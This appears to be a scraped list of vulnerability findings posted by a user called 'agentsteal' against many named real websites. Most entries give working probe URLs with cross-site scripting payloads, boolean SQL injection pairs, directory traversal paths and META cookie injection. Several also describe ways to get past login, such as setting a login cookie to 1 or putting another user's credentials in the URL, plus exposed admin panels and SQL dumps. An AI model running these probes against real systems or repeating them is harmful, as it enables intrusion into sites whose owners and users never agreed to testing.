agentsteal

Array: http://www.aviationrecruitment.co.uk/jobseekers/job-info.php?job_id[] Cross Site Scripting: http://www.aviationrecruitment.co.uk/employers/employers2.php/"><marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.aviationrecruitment.co.uk/employers/employers6.php/"><marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.aviationrecruitment.co.uk/employers/employers10.php/"><marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.aviationrecruitment.co.uk/employers/employers11.php/"><marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.aviationrecruitment.co.uk/employers/employers13.php/"><marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.aviationrecruitment.co.uk/employers/employers14.php/"><marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.aviationrecruitment.co.uk/employers/employers15.php/"><marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.aviationrecruitment.co.uk/employers/employers16.php/"><marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.aviationrecruitment.co.uk/employers/delete.php/"><marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.aviationrecruitment.co.uk/employers/employers1.php/"><marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.aviationrecruitment.co.uk/employers/employers12.php/"><marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.aviationrecruitment.co.uk/employers/employers7.php/"><marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.aviationrecruitment.co.uk/employers/EmployerSearch.php/"><marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.aviationrecruitment.co.uk/employers/index.php/"><marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.aviationrecruitment.co.uk/employers/PostJob.php/"><marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.aviationrecruitment.co.uk/employers/upload.php/"><marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.aviationrecruitment.co.uk/jobseekers/forgot.php/"><marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.aviationrecruitment.co.uk/story.php/"><marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.aviationrecruitment.co.uk/phpinfo.php?<script>alert('vulnerable')</script> Cross Site Scripting: http://www.aviationrecruitment.co.uk/jobseekers/job-info.php?job_id="><marquee><h1>vulnerable</marquee> Cross Site Scripting: There is Cross Site Scripting on the view resume page if the fields contain code. Cross Site Scripting: There is Cross Site Scripting on the edit resume page if the fields contain ">code. Cross Site Scripting: There is Cross Site Scripting on the edit resume page if the fields contain </textarea>code. Cross Site Scripting: There is Cross Site Scripting if the Expect header contains code. Cross Site Scripting: There is Cross Site Scripting on the employer edit profile page if the fields contain ">code. Cross Site Scripting: There is Cross Site Scripting on the employer edit profile page if the drop down menus contain code. Cross Site Scripting: There is Cross Site Scripting on the forgot password page if the fields contain code. Cross Site Scripting: There is Cross Site Scripting on the edit profile page if the fields contain ">code. Cross Site Scripting: There is Cross Site Scripting on the edit profile page if the drop down menus contain code. Cross Site Scripting: There is Cross Site Scripting in the uploaded images. Cross Site Scripting: There is Cross Site Scripting on the image upload page if the filename contains 'code. Cross Site Scripting: There is Cross Site Scripting on the cv upload page if the filename contains 'code. Drop Down Menu: If you edit the drop down menus on the edit resume page you can submit arbitrary values. Drop Down Menu: If you edit the drop down menus on the employer edit profile page you can submit arbitrary values. Drop Down Menu: If you edit the drop down menus when you register you can submit arbitrary values. Drop Down Menu: If you edit the drop down menus on the edit profile page you can submit arbitrary values. Drop Down Menu: If you edit the drop down menus on http://www.aviationrecruitment.co.uk/employers/EmployerSearch.php you can submit arbitrary values. Full Path Disclosure: http://www.aviationrecruitment.co.uk/phpinfo.php Full Path Disclosure: http://www.aviationrecruitment.co.uk/employers/employers4.php Full Path Disclosure: http://www.aviationrecruitment.co.uk/employers/EmployerSearch.php Full Path Disclosure: There is Full Path Disclosure if the drop down menus on http://www.aviationrecruitment.co.uk/employers/EmployerSearch.php contain invalid values. SQL Error: http://www.aviationrecruitment.co.uk/employers/employers10.php SQL Error: http://www.aviationrecruitment.co.uk/employers/employers11.php User Enumeration: http://www.aviationrecruitment.co.uk/~aviation User Enumeration: http://www.aviationrecruitment.co.uk/~root

Cross Site Scripting: There is Cross Site Scripting in the admin panel if the Maximum name length field contains ">code. Cross Site Scripting: There is Cross Site Scripting in the admin panel if the Number of shouts to display field contains ">code. Cross Site Scripting: There is Cross Site Scripting in the admin panel if the Maximum shout length field contains ">code. Cross Site Scripting: There is Cross Site Scripting in the admin panel if the Add a space in words longer than (chars) field contains ">code. Cross Site Scripting: There is Cross Site Scripting in the admin panel if the Main text color (hex) field contains ">code. Cross Site Scripting: There is Cross Site Scripting in the admin panel if the Main text font family field contains ">code. Cross Site Scripting: There is Cross Site Scripting in the admin panel if the Main text font size (pt) field contains ">code. Cross Site Scripting: There is Cross Site Scripting in the admin panel if the Shoutboxer border color (hex) field contains ">code. Cross Site Scripting: There is Cross Site Scripting in the admin panel if the Shoutboxer border size (px) field contains ">code. Cross Site Scripting: There is Cross Site Scripting in the admin panel if the Header writing field contains ">code. Cross Site Scripting: There is Cross Site Scripting in the admin panel if the Header background color (hex) field contains ">code. Cross Site Scripting: There is Cross Site Scripting in the admin panel if the Header text color (hex) field contains ">code. Cross Site Scripting: There is Cross Site Scripting in the admin panel if the Shout button value field contains ">code. Cross Site Scripting: There is Cross Site Scripting in the admin panel if the Main form background color (hex) field contains ">code. Cross Site Scripting: There is Cross Site Scripting in the admin panel if the Form input background color (hex) field contains ">code. Cross Site Scripting: There is Cross Site Scripting in the admin panel if the Form input border color (hex) field contains ">code. Cross Site Scripting: There is Cross Site Scripting in the admin panel if the Form input border size (px) field contains ">code. Cross Site Scripting: There is Cross Site Scripting in the admin panel if the Form input text color (hex) field contains ">code. Cross Site Scripting: There is Cross Site Scripting in the admin panel if the First shout row background color (hex) field contains ">code. Cross Site Scripting: There is Cross Site Scripting in the admin panel if the Alternating shout row background color (hex) field contains ">code. Cross Site Scripting: There is Cross Site Scripting in the admin panel if the Ban notification text color (hex) field contains ">code. Drop Down Menu: If you edit the Order drop down menus you can submit arbitrary values. Drop Down Menu: If you edit the Sort by drop down menus you can submit arbitrary values. Full Path Disclosure: There is Full Path Disclosure if the Order drop down menu contains an invalid value. Full Path Disclosure: There is Full Path Disclosure if the Sort by drop down menu contains an invalid value. Maximum Length: If you edit the input boxes in the admin panel you can submit values that are longer than the maximum lengths. User Enumeration: http://www.diondesign.net/~kjdion

Admin Access: Anyone can access the admin panels. Cross Site Scripting: http://www.phpneoform.com/117/a/<marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.phpneoform.com/117/index.php?<marquee><h1>vulnerable</marquee> Full Path Disclosure: http://www.phpneoform.com/phpneoform.v.1.201/install.php Full Path Disclosure: http://www.phpneoform.com/1201/install.php Includes Directory: http://www.phpneoform.com/ Includes Directory: http://www.phpneoform.com/117/public/ SQL Dump: http://www.phpneoform.com/1201/install.sql SQL Dump: http://www.phpneoform.com/phpneoform.v.1.201/install.sql

Cross Site Scripting: There is Cross Site Scripting on http://www.numberpsychic.net/stage1.php if the playedbefore field contains ">code. Cross Site Scripting: There is Cross Site Scripting on http://www.numberpsychic.net/stage2.php if the aaa field contains ">code. Cross Site Scripting: There is Cross Site Scripting on http://www.numberpsychic.net/stage2.php if the aaaprediction field contains ">code. Cross Site Scripting: There is Cross Site Scripting on http://www.numberpsychic.net/stage3.php if the aaa field contains ">code. Cross Site Scripting: There is Cross Site Scripting on http://www.numberpsychic.net/stage3.php if the bbb field contains ">code. Cross Site Scripting: There is Cross Site Scripting on http://www.numberpsychic.net/stage3.php if the aaaprediction field contains ">code. Cross Site Scripting: There is Cross Site Scripting on http://www.numberpsychic.net/stage3.php if the bbbprediction field contains ">code. Cross Site Scripting: There is Cross Site Scripting on http://www.numberpsychic.net/stage3.php if the stage2table field contains ">code. Cross Site Scripting: There is Cross Site Scripting on http://www.numberpsychic.net/results.php if the aaa field contains code. Cross Site Scripting: There is Cross Site Scripting on http://www.numberpsychic.net/results.php if the bbb field contains code. Cross Site Scripting: There is Cross Site Scripting on http://www.numberpsychic.net/results.php if the ccc field contains code. Cross Site Scripting: There is Cross Site Scripting on http://www.numberpsychic.net/results.php if the aaaprediction field contains code. Cross Site Scripting: There is Cross Site Scripting on http://www.numberpsychic.net/results.php if the bbbprediction field contains code. Cross Site Scripting: There is Cross Site Scripting on http://www.numberpsychic.net/results.php if the cccprediction field contains code. Cross Site Scripting: There is Cross Site Scripting if the drop down menus contain ">code. Drop Down Menu: If you edit the drop down menus you can submit arbitrary values.

Array: http://www.xsvcash.com/test/register.php?r[] Cross Site Scripting: http://www.xsvcash.com/cgi-bin/gpte.cgi?page=User_Signup_Form&E_Mail=<marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.xsvcash.com/cgi-bin/gpte.cgi?page=User_Signup_Form&Referrer=<marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.xsvcash.com/cgi-bin/gpte.cgi.old?page=User_Signup_Form&E_Mail=<marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.xsvcash.com/cgi-bin/gpte.cgi.old?page=User_Signup_Form&Referrer=<marquee><h1>vulnerable</marquee> Cross Site Scripting: There is Cross Site Scripting on the Account Info page if your useragent contains code. Cross Site Scripting: There is Cross Site Scripting when you register if the fields contain ">code. Directory Transversal: http://www.xsvcash.com/cgi-bin/gptecntct.cgi?url=../cgi-bin/ Directory Transversal: http://www.xsvcash.com/cgi-bin/gptelogin.cgi?id=aaaaaa&pass=aaaaaa&op=0&ut=0&url=../ Directory Transversal: http://www.xsvcash.com/cgi-bin/gptemsg.cgi?url=../cgi-bin/ Full Path Disclosure: http://www.xsvcash.com/test/contact.php Full Path Disclosure: http://www.xsvcash.com/test/ Full Path Disclosure: http://www.xsvcash.com/test/advertise.php Full Path Disclosure: http://www.xsvcash.com/test/config.php Full Path Disclosure: http://www.xsvcash.com/test/login.php Full Path Disclosure: http://www.xsvcash.com/test/register.php Full Path Disclosure: http://www.xsvcash.com/test/surf.php Includes Directory: http://www.xsvcash.com/pages/ Insecure Cookie: You shouldn't put the password in the cookie. Insecure Cookie: You shouldn't put the username in the cookie. SQL Injection: http://www.xsvcash.com/cgi-bin/gptemsgbox.cgi?ut=0&msg=1 AND 1=1 http://www.xsvcash.com/cgi-bin/gptemsgbox.cgi?ut=0&msg=1 AND 1=2 SQL Injection: http://www.xsvcash.com/cgi-bin/gpte.cgi?page=EMail_Verification_Code_Sent'+and+'1'='1 http://www.xsvcash.com/cgi-bin/gpte.cgi?page=EMail_Verification_Code_Sent'+and+'1'='2 SQL Injection: http://www.xsvcash.com/cgi-bin/gpte.cgi.old?page=EMail_Verification_Code_Sent'+and+'1'='1 http://www.xsvcash.com/cgi-bin/gpte.cgi.old?page=EMail_Verification_Code_Sent'+and+'1'='2 URL Inclusion: http://www.xsvcash.com/cgi-bin/gptecntct.cgi?url=http://www.google.com/ URL Inclusion: http://www.xsvcash.com/cgi-bin/gptemsg.cgi?url=http://www.google.com/ URL Inclusion: http://www.xsvcash.com/cgi-bin/gptelogin.cgi?id=aaaaaa&pass=aaaaaa&op=0&ut=0&url=http://www.google.com/ User Enumeration: http://www.xsvcash.com/~root User Enumeration: http://xsvcash.com/~xsvcashc You can log in as any user by setting the URL to their username and password. You shouldn't put the password in the URL. You shouldn't put the username in the URL.

Array: http://www.oxyfactor.com/billing/index.php?action[] Array: http://www.oxyfactor.com/billing/index.php?fuse[] Array: http://www.oxyfactor.com/billing/index.php?view[] Cross Site Scripting: There is Cross Site Scripting on the Account Information page if the Coupon Code field contains ">code. Cross Site Scripting: There is Cross Site Scripting on the Account Information page if the Password field contains ">code. Cross Site Scripting: There is Cross Site Scripting on the Terms and Conditions when you register if the fields contain ">code. Directory Transversal: http://www.oxyfactor.com/index.php?page=about/../hosting DOS: http://www.oxyfactor.com/modules/forums/index.inc.php/ Drop Down Menu: If you edit the drop down menus on the registration page you can submit arbitrary values. Full Path Disclosure: http://www.oxyfactor.com/billing/index.php?action=a Full Path Disclosure: http://www.oxyfactor.com/billing/index.php?fuse=admin&action=RequestPassword&ajaxRequest=1&emailToSend[] Full Path Disclosure: http://www.oxyfactor.com/billing/classes/MailGateway.php Full Path Disclosure: http://www.oxyfactor.com/billing/modules/admin/actions/RequestPassword.php Full Path Disclosure: http://www.oxyfactor.com/billing/index.php?view=a Includes Directory: http://www.oxyfactor.com/billing/templates/Raleigh/signup/ User Enumeration: http://www.oxyfactor.com/~nobody User Enumeration: http://www.oxyfactor.com/~oxyfacto User Enumeration: http://www.oxyfactor.com/~root

Cross Site Scripting: http://char.rev-ro.com/img.php?"><marquee><h1>vulnerable</marquee> Cross Site Scripting: There is Cross Site Scripting in the avatars. Cross Site Scripting: There is Cross Site Scripting if the Player Bio field contains </textarea>code. Cross Site Scripting: There is Cross Site Scripting if the Expect header contains code. Full Path Disclosure: There is Full Path Disclosure if the PHPSESSID cookie is set to an invalid value.

Full Path Disclosure: http://toxic.local-host.co.il/index.php?a[]

Admin Access: http://www2.winmastergames.com/freemusic/login.js contains your password. Cross Site Scripting: There is Cross Site Scripting in the avatars. Cross Site Scripting: There is Cross Site Scripting on http://www2.winmastergames.com/bloodscars/website-data/blog/post.php if the fields contain ">code. Drop Down Menu: If you edit the drop down menu on http://www2.winmastergames.com/yonder/ you can submit arbitrary values. Full Path Disclosure: http://www2.winmastergames.com/yonder/?url=youtube.com You can view the pages in http://www2.winmastergames.com/freemusic/ without logging in if you don't let the pages redirect you. You can view the pages in http://www2.winmastergames.com/freemusic/ without logging in if you set the login cookie to 1. You can view the pages in http://www2.winmastergames.com/test/ without logging in if you don't let the pages redirect you. You can view the pages in http://www2.winmastergames.com/test/ without logging in if you set the login cookie to 1.

Array: http://www.phpsnips.com/help.php?help[] Array: http://www.phpsnips.com/help.php?id[] Array: http://www.phpsnips.com/search.php?letter[] Array: http://www.phpsnips.com/search.php?search_by=1&q[] Array: http://www.phpsnips.com/snippet.php?id[] Array: http://www.phpsnips.com/snippet_comment.php?id[] Array: http://www.phpsnips.com/tempSnip.php?id[] Array: http://www.phpsnips.com/temp_snippet_comment.php?id[] Array: http://www.phpsnips.com/vote.php?id[] Cross Site Scripting: http://www.phpsnips.com/editTempSnip.php?id="><marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.phpsnips.com/help.php?help=<marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.phpsnips.com/help.php?id="><marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.phpsnips.com/join.php/"><marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.phpsnips.com/search.php?letter=<marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.phpsnips.com/search.php?search_by=1&q=<marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.phpsnips.com/snippet.php?id="><marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.phpsnips.com/snippet_comment.php?id="><marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.phpsnips.com/tempSnip.php?id="><marquee><h1>vulnerablevulnerable</marquee> Cross Site Scripting: http://www.phpsnips.com/temp_snippet_comment.php?id="><marquee><h1>vulnerable</marquee> Cross Site Scripting: There is Cross Site Scripting when you submit a snippet if the title field contains ">code and the code field is null. Cross Site Scripting: There is Cross Site Scripting when you post a snippet if the title contains code. Cross Site Scripting: There is Cross Site Scripting on the edit snippet page if the title field contains ">code. Cross Site Scripting: There is Cross Site Scripting on the edit snippet page if the code field contains </textarea>code. Full Path Disclosure: http://www.phpsnips.com/editTempSnip.php?id[] META Tag Injection: http://www.phpsnips.com/help.php?help=<meta+http-equiv='Set-cookie'+content='PHPSESSID=vulnerable'> META Tag Injection: http://www.phpsnips.com/search.php?search_by=1&q=<meta+http-equiv='Set-cookie'+content='PHPSESSID=vulnerable'> SQL Dump: http://www.phpsnips.com/examples/Text1.php SQL Error: http://www.phpsnips.com/help.php?id=' SQL Error: http://www.phpsnips.com/search.php?letter=' SQL Error: http://www.phpsnips.com/snippet.php?id=' SQL Error: http://www.phpsnips.com/snippet_comment.php?id=' SQL Error: http://www.phpsnips.com/tempSnip.php?id=' SQL Error: http://www.phpsnips.com/temp_snippet_comment.php?id=' SQL Injection: http://www.phpsnips.com/snippet_comment.php?id=1' AND 1='1 http://www.phpsnips.com/snippet_comment.php?id=1' AND 1='2

Cross Site Scripting: There is Cross Site Scripting if a comment contains code. Full Path Disclosure: http://www.helraizer.co.uk/count/test.php Full Path Disclosure: http://www.helraizer.co.uk/count/test1.php

Includes Directory: http://www.carnagestk.info/admin/ Includes Directory: http://www.carnagestk.info/include/ Includes Directory: http://www.carnagestk.info/sql/

Array: http://anuj-blog.co.nr/?page[] Cross Site Scripting: http://anuj-blog.co.nr/?page=<marquee><h1>vulnerable</marquee> Cross Site Scripting: There is Cross Site Scripting if the Expect header contains code. Directory Transversal: http://anuj-blog.co.nr/?page=../themes/doop DOS: http://anuj-blog.co.nr/?page=../themes/doop Full Path Disclosure: http://anuj-blog.co.nr/?page Full Path Disclosure: There is Full Path Disclosure if the PHPSESSID cookie is set to an invalid value. Includes Directory: http://anuj-blog.co.nr/pages/ User Enumeration: http://anuj-blog.co.nr/~nobody User Enumeration: http://anuj-blog.co.nr/~root

Cross Site Scripting: http://www.sheepeep.com/index.php?p=1'><marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.sheepeep.com/index.php?p=4<marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.sheepeep.com/index.php?page=news&date=<marquee><h1>vulnerable</marquee> Full Path Disclosure: http://www.sheepeep.com/admin.php Full Path Disclosure: http://www.sheepeep.com/avatarparse.php Full Path Disclosure: http://www.sheepeep.com/avatarparse.php?id=2 Full Path Disclosure: http://www.sheepeep.com/comments.php Full Path Disclosure: http://www.sheepeep.com/index.php?p=4 Full Path Disclosure: http://www.sheepeep.com/index.php?p[] Full Path Disclosure: http://www.sheepeep.com/index.php?page[] Full Path Disclosure: http://www.sheepeep.com/login.php Full Path Disclosure: http://www.sheepeep.com/mod.php Full Path Disclosure: http://www.sheepeep.com/index.php?page=news&date=a Full Path Disclosure: http://www.sheepeep.com/pages.php Full Path Disclosure: http://www.sheepeep.com/profile.php Full Path Disclosure: http://www.sheepeep.com/register.php Full Path Disclosure: http://www.sheepeep.com/usercp.php SQL Error: http://www.sheepeep.com/index.php?p=a SQL Error: http://www.sheepeep.com/index.php?page=members&p=99999999999999 SQL Error: http://www.sheepeep.com/index.php?page=profile&id=1 SQL Error: There is an SQL Error if your username contains \\ SQL Error: There is an SQL Error on http://www.sheepeep.com/admin/ if your password contains \\ SQL Error: There is an SQL Error on http://www.sheepeep.com/mod/ if your password contains \\ SQL Error: There is an SQL Error when you register.

Admin Access: Anyone can access the admin panel. Admin Access: If you add .php in the admin panel as a valid file upload extension you can upload PHP scripts. Cross Site Scripting: http://www.helraizer.co.uk/test/index.cgi?mode=album&album=<marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.helraizer.co.uk/test/index.cgi?mode=image&album=/Sample%20Album&image=<marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.helraizer.co.uk/test/index.cgi?mode=search&searchstring="><marquee><h1>vulnerable</marquee> Cross Site Scripting: There is Cross Site Scripting if your username contains ">code. Drop Down Menu: If you edit the drop down menu on http://www.helraizer.co.uk/test/index.cgi?mode=album&album=%2FSample+Album you can submit arbitrary values. Drop Down Menu: If you edit the drop down menu on http://www.helraizer.co.uk/test/index.cgi?mode=image&album=%2FSample+Album&image=Orange+Flower.jpg you can submit arbitrary values. Maximum Length: If you edit the message field you can remove the maximum length. Maximum Length: If you edit the username field you can remove the maximum length.

Array: http://www.aplaceforpets1.com/category.php?cat[] Array: http://www.aplaceforpets1.com/search.php?q[] Array: http://www.aplaceforpets1.com/thumbnail.php?img[] Cross Site Scripting: http://www.aplaceforpets1.com/category.php?cat=<marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.aplaceforpets1.com/search.php?q=<marquee><h1>vulnerable</marquee> Cross Site Scripting: There is Cross Site Scripting when you register if the fields contain code. Directory Transversal: http://www.aplaceforpets1.com/thumbnail.php?img=../public_html/puppy/leah.jpg Drop Down Menu: If you edit the drop down menu on the category page you can submit arbitrary values. Full Path Disclosure: http://www.aplaceforpets1.com/category.php?offseta[] Full Path Disclosure: http://www.aplaceforpets1.com/page.php Full Path Disclosure: http://www.aplaceforpets1.com/product.php Full Path Disclosure: http://www.aplaceforpets1.com/products.php?browse[] Full Path Disclosure: http://www.aplaceforpets1.com/thumbnail.php SQL Error: http://www.aplaceforpets1.com/category.php?cat=' SQL Injection: http://www.aplaceforpets1.com/category.php?cat=1 OR 1=1 http://www.aplaceforpets1.com/category.php?cat=1 OR 1=2 SQL Injection: http://www.aplaceforpets1.com/page.php?id=11 AND 1=1 http://www.aplaceforpets1.com/page.php?id=11 AND 1=2 SQL Injection: http://www.aplaceforpets1.com/product.php?id=14 AND 1=1 http://www.aplaceforpets1.com/product.php?id=14 AND 1=2 User Enumeration: http://www.aplaceforpets1.com/~aplacef3 User Enumeration: http://www.aplaceforpets1.com/~root

Cross Site Scripting: http://www.debateatopic.com/verification/"><marquee><h1>vulnerable</marquee> Cross Site Scripting: There is Cross Site Scripting on the Contact Us page if the drop down menu contains ">code. Cross Site Scripting: There is Cross Site Scripting on the Contact Us page if the fields contain ">code. Drop Down Menu: If you edit the drop down menu on the Contact Us page you can submit arbitrary values. Full Path Disclosure: http://www.debateatopic.com/?module=categories&cat[] Full Path Disclosure: http://www.debateatopic.com/?module=verification&vid[] Full Path Disclosure: http://www.debateatopic.com/download Full Path Disclosure: There is Full Path Disclosure if the login cookie is an array. Full Path Disclosure: There is Full Path Disclosure if the PHPSESSID cookie is an array. Full Path Disclosure: There is Full Path Disclosure if the PHPSESSID cookie is set to an invalid value. Includes Directory: http://www.debateatopic.com/includes/pages/

Cross Site Scripting: http://www.clickonlinehomes.com/?c=<marquee><h1>vulnerable</marquee> Cross Site Scripting: There is Cross Site Scripting on the search page if the drop down menus contain code. Cross Site Scripting: There is Cross Site Scripting on the save a search page if the drop down menus contain code. Cross Site Scripting: There is Cross Site Scripting on the My Account page if the fields contain code. Cross Site Scripting: There is Cross Site Scripting when you register if the fields contain ">code. Cross Site Scripting There is Cross Site Scripting when you save a search if the fields contain code. Drop Down Menu: If you edit the drop down menus on the search page you can submit arbitrary values. Insecure Cookie: You shouldn't put the email address in the cookie. SQL Dump: http://www.clickonlinehomes.com/test.txt SQL Error: There is an SQL Error on the search page if the drop down menus contain invalid values. You can log in as any user by setting the email cookie to their email address.

Cross Site Scripting: There if Cross Site Scripting if the URL field contains code. Full Path Disclosure: http://www.flash-portal.org/fp-proxy/completeRequest.php Full Path Disclosure: http://www.flash-portal.org/fpslay/codedfp/po/completeRequest.php User Enumeration: http://www.flash-portal.org/~root

Array: http://www.officialmc.com/email/?_action=compose&_to[] Array: http://www.officialmc.com/email/?_mbox[] Includes Directory: http://www.officialmc.com/email/bin/

Cross Site Scripting: http://ns2271.serverpowered.net/wv/<marquee><h1>vulnerable</marquee> Cross Site Scripting: There is Cross Site Scripting when you upload an image if the image notes field contains </textarea>code. Cross Site Scripting: There is Cross Site Scripting if your username contains ">code. Cross Site Scripting: There is Cross Site Scripting on http://ns2271.serverpowered.net/wv/ if your username contains ">code. Cross Site Scripting: There is Cross Site Scripting on http://ns2271.serverpowered.net/wv/cti/ if your username contains ">code. Cross Site Scripting: There is Cross Site Scripting on http://ns2271.serverpowered.net/wv/gha/ if your username contains ">code. Drop Down Menu: If you edit the drop down menus on the options page you can submit arbitrary values. Full Path Disclosure: http://ns2271.serverpowered.net/wv/ Full Path Disclosure: There is Full Path Disclosure if the fields contain invalid values. Full Path Disclosure: There is Full Path Disclosure if you upload an image. SQL Error: http://ns2271.serverpowered.net/wv/contact/ User Enumeration: http://ibsdev.serverpowered.net/~root User Enumeration: http://ibsdev.serverpowered.net/~webview

Cross Site Scripting: http://www.theinsomniaxe.com/hoast/index.php/"><marquee><h1>vulnerable</marquee> Cross Site Scripting: There is Cross Site Scripting if the filename contains code. Cross Site Scripting: There is Cross Site Scripting in the image upload. Full Path Disclosure:

Array: http://php-scripts.inpraag.nl/tools/createClass.php?className[] Array: http://php-scripts.inpraag.nl/tools/createClass.php?functions[] Array: http://php-scripts.inpraag.nl/tools/createClass.php?variables[] Cross Site Scripting: http://php-scripts.inpraag.nl/tools/createClass.php?className="><marquee><h1>vulnerable</marquee> Cross Site Scripting: http://php-scripts.inpraag.nl/tools/createClass.php?className=</textarea><marquee><h1>vulnerable</marquee> Cross Site Scripting: http://php-scripts.inpraag.nl/tools/createClass.php?functions=</textarea><marquee><h1>vulnerable</marquee> Cross Site Scripting: http://php-scripts.inpraag.nl/tools/createClass.php?variables=</textarea><marquee><h1>vulnerable</marquee>

CAPTCHA: The CAPTCHA never changes. Cross Site Scripting: There is Cross Site Scripting on http://nab.geekrack.net/ip.php if the ip address field contains code. Full Path Disclosure: http://www.youcade.net/nab/index.php?act=newtopic Full Path Disclosure: http://www.youcade.net/nab/index.php?act=topicshow&id=a Full Path Disclosure: http://www.youcade.net/nab/index.php?act=viewforum SQL Error: http://nab.geekrack.net/index.php?act=viewforum&id=1&p=a User Enumeration: http://www.youcade.net/~root User Enumeration: http://www.youcade.net/~youcade

Cross Site Scripting: There is Cross Site Scripting on http://www.hosting-needs.com/testscripts/ftptest1.php if the fields contain code. Full Path Disclosure: There is Full Path Disclosure on http://www.hosting-needs.com/testscripts/ftptest1.php if you submit an FTP server. Full Path Disclosure: There is Full Path Disclosure if you submit a host. User Enumeration: http://www.hosting-needs.com/~mainsite